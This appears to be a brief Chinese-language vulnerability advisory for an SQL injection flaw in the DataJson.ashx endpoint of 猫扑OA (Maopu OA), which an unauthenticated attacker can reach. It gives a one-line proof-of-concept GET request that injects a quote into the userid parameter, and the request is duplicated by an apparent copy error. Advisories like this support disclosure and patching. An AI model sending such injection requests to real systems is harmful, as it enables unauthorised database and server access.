漏洞描述
猫扑OA DataJson.ashx接口未对用户传入的参数进行合理的校验和过滤,导致传入的参数直接携带到数据库执行,导致SQL注入漏洞,未经身份验证的攻击者可通过此漏洞获取数据库权限,深入利用可获取服务器权限。
猫扑OA DataJson.ashx 存在SQL注入漏洞
PoC代码
GET /api/Html/Document/DataJson.ashx?userid=1' HTTP/1.1GET /api/Html/Document/DataJson.ashx?userid=1' HTTP/1.1